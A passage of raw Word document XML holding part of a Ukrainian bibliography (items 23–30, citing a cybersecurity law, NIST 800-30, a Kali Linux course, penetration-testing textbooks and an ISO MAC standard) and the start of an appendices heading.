    <w:p w:rsidR="00C95949" w:rsidRDefault="00C95949" w:rsidP="00C31695">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23. </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="00594EB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Про основні засади забезпечення кібербезпеки України : закон</w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="00594EB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>України від 05.10.2017 р. URL : https://zakon.rada.gov.ua/laws/show/2163-</w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>19#Text ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31695" w:rsidRPr="00DF0A03" w:rsidRDefault="00C95949" w:rsidP="00C31695">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24. </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="00DF0A03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>DIGITAL 2020: GLOBAL DIGITAL OVERVIEW [Електронний</w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="00DF0A03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ресурс] – Режим доступу до ресурсу: https://datareportal.com/reports/digital-2020-global-digital-overview.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00404F7B" w:rsidRDefault="00C95949" w:rsidP="00404F7B">
      <w:pPr>
        <w:ind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25. </w:t>
      </w:r>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST 800 – 30 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Risk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Information</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Technology</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Systems</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00404F7B" w:rsidRDefault="00404F7B" w:rsidP="00404F7B">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26. </w:t>
      </w:r>
      <w:r w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">PEN-103: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Revealed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidRPr="00884BB2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>https://www.offsec.com/courses/pen-103/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00964D26" w:rsidRDefault="00964D26" w:rsidP="00404F7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27. </w:t>
      </w:r>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00ED5E00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Тестування на проникнення: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00ED5E00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>навч</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00ED5E00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00ED5E00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>посіб</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="00ED5E00">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Ч.1 / [Є.О. Живило]; за ред. Є.О. Живило. –П.: ПНТУ “Полтавська політехніка ім. Юрія Кондратюка”, 2024. – 134 с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00404F7B" w:rsidRPr="00ED5E00" w:rsidRDefault="00964D26" w:rsidP="00404F7B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind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28. </w:t>
      </w:r>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Живило, Є.О. Тестування на проникнення [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>навч.посіб</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">.] . Ч. 2. / Є.О. Живило; за ред. Є.О. Живило.- Полтава: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Нац</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00404F7B" w:rsidRPr="000850ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. ун-т ім. ю. Кондратюка, 2024.- 239 с.</w:t>
      </w:r>
      <w:r w:rsidR="00404F7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00964D26" w:rsidRDefault="00964D26" w:rsidP="00191CBC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>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29. </w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Брюс Эккель</w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="009707A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ф</w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ілософі</w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="009707A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">я Java [Електронний ресурс]. </w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="009707A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">2019. </w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="009707A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="009707A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>доступу</w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="00DF0A03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>до ресурсу:</w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="009707A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="009707A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>https://bit.ly/2JbSgHe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31695" w:rsidRDefault="00964D26" w:rsidP="00C31695">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30. </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="001B4145">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ДСТУ ISO/IEC 9797-1:2015 (ISO/IEC 9797-1:2011, IDT). Інформаційні</w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> технології. Методи захисту. Ко</w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="001B4145">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ди автентифікації повідомлень (macs). Частина 1. Механізми, що використовують блоковий шифр. Електронний</w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="001B4145">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ресурс. Режим доступу: http://shop.uas.org.ua/ua/informacijni-tehnologii-metodi-zahistu-kodi-avtentifikacii-povidomlen-macs-chastina-1-mehanizmi-scho-vikoristovujut-blokovij-shifr.html</w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00964D26" w:rsidRDefault="00964D26" w:rsidP="00191CBC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F14887" w:rsidRDefault="00F14887">
      <w:pP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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D0623D" w:rsidRDefault="00F14887" w:rsidP="00F14887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F50033">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ДОДАТКИ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F14887" w:rsidRDefault="00F14887" w:rsidP="00F14887">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
